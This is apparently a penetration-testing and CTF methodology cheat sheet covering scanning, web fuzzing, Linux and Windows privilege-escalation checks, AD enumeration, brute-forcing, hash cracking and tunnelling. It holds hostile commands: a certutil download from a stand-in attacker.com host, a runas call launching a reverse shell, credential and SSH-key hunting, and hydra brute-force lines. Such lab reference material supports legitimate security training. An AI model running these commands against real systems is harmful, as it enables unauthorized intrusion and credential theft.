-
Scanning:
Start with a TCP scan; if you do not get anything from footprinting the services found, then only go for a UDP scan since it is time-consuming.
nmap -T4 -p- -A -Pn -v target.com # TCP scan sudo nmap -sU -Pn -v target.com # scan only top UDP ports, unless you have a lot of time to kill # we can also check with alt scanning tools like nikto nikto -h target.com # if we want to check on a network level netdiscover -r 10.0.2.0/24
-
Service footprinting:
Based on whatever ports & services are there; consider enumerating manually as well as using automated tools. Also, search for found ports and services - it could be associated with a known vulnerable service/version
-
Clues:
Look for certain clues and hints in the challenge statement itself. For example, if the word 'knock' is mentioned, it would refer to
knock
as in port knocking, after which we will have to re-scan the machine. -
Web enumeration:
As with anything else, do not leave any stone unturned. Check everything, and do not assume anything. For any check, use multiple wordlists and multiple tools.
For manual enumeration, always check the following at least:
-
'Inspect' and 'View Page Source' - check all tabs in Inspect part, and source code thoroughly for any clues
-
Input fields - for any field which takes user input, test it with all possible payloads to check for all types of web attacks like SQLi, XSS, XXE, LFI, etc.
-
Login forms - same as above; check for all payloads imaginable, use multiple wordlists. Common attacks in login forms include SQLi, NoSQLi, null byte injection, etc; if needed, we can use tools such as
sqlmap
-
Command injection - for any input forms, check if command injection payloads work; in case of blind scenarios or when we are not able to see output, we can try by creating a file or fetching a page from attacker machine
-
Burp Suite - if going nowhere, take a tour of the webpages but with Intercept enabled; helpful for any redirects or hints
-
SSL certificate - in a few cases, viewing the certificate gives us extra information like usernames, email addresses, subdomains, etc.
-
File info - for any files encountered, check if it has any secret data or any other use; some files need to be checked by hexdump tools to view the magic numbers, or they might have embedded files.
-
Technologies used and their versions - this can lead us to known exploits; research extensively on platforms such as Google, ExploitDB and Metasploit.
-
Parameter fuzzing - various wordlists can be used for fuzzing parameters using tools like
ffuf
-
Weak/default credentials - for any login page, make sure you try default or weak creds first before proceeding with any bruteforce attempt
-
Bruteforce - if you really need to use
hydra
to bruteforce basic authentication or login form, for example, then make sure you know the username(s) and for passwords you can use rockyou.txt; in case usernames are not given, choose a few common usernames or based on the challenge, and in addition to that generate a wordlist from the website usingcewl
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,bak,jpg,zip,bac,sh,png,md,jpeg,pl,ps1 -t 25 # directory scan - this is not recursive to save time # if any directories found, recursively scan those directories in another command # if recursive scanning is really required feroxbuster -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,bak,js,txt,json,docx,pdf,zip,cgi,sh,pl,aspx,sql,xml --extract-links --scan-limit 2 --filter-status 400,401,404,405,500 --silent # use multiple wordlists - when checking again, start with smaller wordlists like 'common.txt' and then go for bigger ones like 'raft-large-*.txt' # and if that does not give anything, use another tool like ffuf for directory scanning # additionally, scan directories which provide directory listing as well - things can be hidden from us ffuf -u https://target.com/folder/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s # directory scanning using ffuf ffuf -c -u "http://target.com" -H "Host: FUZZ.target.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 25 -fs 10005 -s # subdomain enumeration, filter false positives # similar to the above, always check with multiple wordlists and multiple tools gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt # vhost enumeration sudo wfuzz -c -f sub-fighter -u "http://target.com" -H "Host: FUZZ.target.com" -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 # alt tool for subdomain enum ffuf -w /usr/share/seclists/Fuzzing/UnixAttacks.fuzzdb.txt -u "http://target.com/index.php?referer=FUZZ" -fw 1680 # parameter fuzzing wfuzz -u http://target.com/dashboard.php?FUZZ=ls+-la -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hw 0 # parameter fuzzing can also check for RCE wfuzz -v -c -z file,/usr/share/wordlists/rockyou.txt -d "{"username":"admin","password":"FUZZ"}" --hw 42 http://target.com/api/login # web bruteforce using wfuzz - hydra can also be used
-
linpeas.sh
is a good starting point - go through everything listed in its output. But in case you are not getting anything, manual checks will help:
id
# check which groups you are part of - some groups have more permissions
ls -la
# search all files in home directory and go through them
# tip - use the 'file' command to quickly check what type of file it is - if it is of use, we can transfer it to our machine
ls -la /home
# check all users
# if possible go through their directories
# we can have interesting folders like '.ssh' or '.mozilla'
sudo -l
# if we have password, check the commands we can run as root or other user/group
# this command will also show if we have LD_PRELOAD set for example
history
# check previous commands
# if we have a web directory, enumerate it completely for any creds
ls -la /var/www/
find / -perm -222 -type d 2>/dev/null
# search world-writable folders
find / -type f -iname ".*" -ls 2>/dev/null
# search all hidden files
find / -type f -user joe 2>/dev/null
# search files owned by 'joe'
find / -group userGroup 2>/dev/null
# search files owned by 'userGroup'
find / -type f -perm -04000 -ls 2>/dev/null
# find files that have SUID
grep --color=auto -rnw -iIe "PASSW\|PASSWD\|PASSWORD\|PWD" --color=always 2>/dev/null
# check password strings
# for extended password hunting, check the PasswordAttacks module from HTB
# it includes a section on finding creds
find / -perm -u=s -type f 2>/dev/null
# check SUID binaries - for exploits, check GTFOBins
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
# check for SSH keys
cat /etc/exports
# check for 'no_root_squash'
# in some cases, there are unknown or offbeat SUID binaries, they should be checked first
# run those binaries and try to understand how it works
# see how it responds to input, certain binaries can be exploited through buffer overflow, ret2libc, etc.
# if required, transfer to attacker machine and reverse engineer with Ghidra - we can check function code, strings
# we can also upload the binary to an online tool like Decompiler Explorer, and copy-paste the output code in ChatGPT for an overview
ls -la /mnt
# check if anything is mounted
lsblk
# list blocks
# for any interesting binaries or anything with a name or version attached, research for known exploits
# linpeas would not help here, so we need to manually check
cat /etc/crontab
# check scheduled jobs
./pspy64
# check processes running in background using pspy
# also, if any interesting programs are found, like Python or Bash scripts
# try to understand how it works and if that can be exploited
# using methods like library hijacking, tar wildcard injection
ls -la /etc/update-motd.d/
# check if we have any writable banner or MOTD files
mysql -u root -p
# enumerate internal services such as mysql
# with known or common passwords
env
# check for specific env variables set
# like env_keep+=LD_PRELOAD
# if there is a script to be modified
# and we do not have write access to script but write access to directory
# we can create another evil script in same directory and create a symbolic link
ss -ltnp
# check internal services for open ports
# if unusual ports are seen here, it could be checked further
getcap -r / 2>/dev/null
# check capabilities
# check if the target box is a Docker image
# so that we can break out of it
hostname
# random hostname
ls -la /
# includes .dockerenv
cat /proc/1/cgroup
# includes 'docker' in paths
ifconfig
# check machine IP; we can also run 'hostname -i'
# if we are in a Docker env, we can check internal ports
# using a primitive bash port-scanner to check internal services
# we can also consider a ping-sweep to check for other machines in same network - for example
for i in {1..255}; do (ping -c 1 172.18.0.${i} | grep "bytes from" &); done
# this step should be considered only when no other privesc vectors have been identified on machine
# example - if we have access to MySQL DB, we can inject PHP code into table
# and save table to file on remote system - then we can get RCE using curl
# if pivoting into other machines in same network is required
# we can look into sshuttle and scanning other internal hosts using a ping sweep - check THM Holo room
whoami
# user
whoami /priv
# current user privileges
whoami /groups
net users
# list users
net user Administrator
# list user details
qwinsta
# other users logged in
net localgroup
# users groups
net localgroup Administrators
# list group members
systeminfo
# verbose output
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
# shows only required info
hostname
gci -force
# show hidden directories in PS
findstr /si password *.txt
# recursively search all directories for 'password' string in text files
# for extended password hunting, check the PasswordAttacks module from HTB
# it includes a section on finding creds
cmdkey /list
# lists saved credentials
runas /savecred /user:admin reverse_shell.exe
# try credentials
# registry keys can also contain passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# check for password reuse as well
# if we have credentials for a user, test it
evil-winrm -u "joe" -p "p@ssw0rd!" -i target.com
# for port forwarding, we can use plink.exe
wmic qfe get Caption,Description,HotfixID,InstalledOn
# lists updates installed using wmic tool
wmic logicaldisk get caption,description,providername
# list drives
where -R C:\Windows wsl.exe
# search for windows subsystem for linux
# you can also search for bash.exe
ipconfig /all
arp -a
# check arp tables
route print
# check routing tables
netstat -ano
# lists listening ports on target system
schtasks /query /fo LIST /v
# lists scheduled tasks
driverquery
# installed drivers
sc queryex type=service
# service enum
sc query windefend
# check for Windows Defender
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
# firewall enumeration
wmic product
# prints info on product
wmic product get name,version,vendor
# filter output
wmic service list brief
# all services
wmic service list brief | findstr "Running"
# filter output
sc qc service
# prints info on service
certutil.exe -urlcache -f http://attacker.com/winpeas.exe winpeas.exe
# fetch file from attacker machine to target - like wget or curl
# check for DLL hijacking vulns using ProcMon
# check for unquoted service path vuln
# requires permission to write to a folder on the path and to restart the service
wmic service get name,displayname,pathname,startmode
# check running services with unquoted paths
sc qc unquotedsvc
# check binary path of service
.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"
# check privileges on folders in binary path and find a writable folder
# after this, we can generate a payload using msfvenom
# move payload to target in the correct path, setup listener, and restart service
sc stop unquotedsvc
sc start unquotedsvc
# Active Directory enum
net user /domain
# list all users
net user joe.bloggs /domain
# info for particular user
net user Guest /domain
# info for guest account
net group /domain
# list all groups
net group "Admins" /domain
# info for group
net accounts /domain
# enumerate password policy
# we can enumerate AD using PowerShell as well
# using cmdlets like Get-ADUser, Get-ADGroup, Get-ADObject and Get-ADDomain
# or using tools such as Sharphound/Bloodhound
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
# check Autoruns for any programs - the path will differ
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# check for AlwaysInstallElevated
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
# check for exploits related to regsvc
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
# check for file permissions on executable files
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
# check for Startup apps
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
# service permissions
-
Whenever you come across any image files, given the context, you can always give steganography a try; if you happen to have a password/string, you can check with tools like
steghide
. For other types of files, like audio files, we have stego tools likewavsteg
andSonic Visualizer
, so you should know which tool to try for which type of file:steghide extract -sf image.jpg foremost -i image.jpg strings -n 6 image.jpg stegseek image.jpg /usr/share/wordlists/rockyou.txt # check if it is using common passwords exiftool image.jpg binwalk --dd='.*' image.jpg zsteg -a test.png
-
Cryptography:
For any text that you cannot understand or decode, it could be encoded/encrypted, and sometimes in multiple layers. Check with the following tools:
-
Bruteforce:
hydra
can be used for bruteforcing for multiple services:hydra -l joe -P pwd.lst ssh://target.com hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt target.com ftp crunch 4 4 -t "s@@@" -o pwd.lst # if we have a known pattern of password cewl -d 5 -m 8 -e http://target.com -w wordlist.txt # generate wordlist from website # -d for spidering depth, and -m for minimum wordlength
-
Cracking tools:
-
ssh2john
:ssh2john id_rsa > hash_id_rsa john --wordlist=/usr/share/wordlists/rockyou.txt hash_id_rsa
-
zip2john
:zip2john backups.zip > ziphash.txt john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt
-
gpg2john
:gpg2john private.asc > asc_hash john --wordlist=/usr/share/wordlists/rockyou.txt asc_hash
-
hashcat
:hashcat -a 0 -m 1600 apachehash.txt /usr/share/wordlists/rockyou.txt
-
-
SSH tunnelling:
ssh [email protected] -i id_rsa -D 1337 # setup dynamic port forwarding # in attacker machine, setup port forwarding vim /etc/proxychains.conf # comment out 'socks4 127.0.0.1 9050' at end of config # and add 'socks5 127.0.0.1 1337' # use proxychains to enumerate internal ports on target machine # command to be run on attacker machine proxychains nmap -sT 127.0.0.1 # perform local port forwarding, to port 80, using -L # after this we will be able to access service, which is running on target server port 80, on our attacker machine port 4444 ssh [email protected] -i id_rsa -L 4444:127.0.0.1:80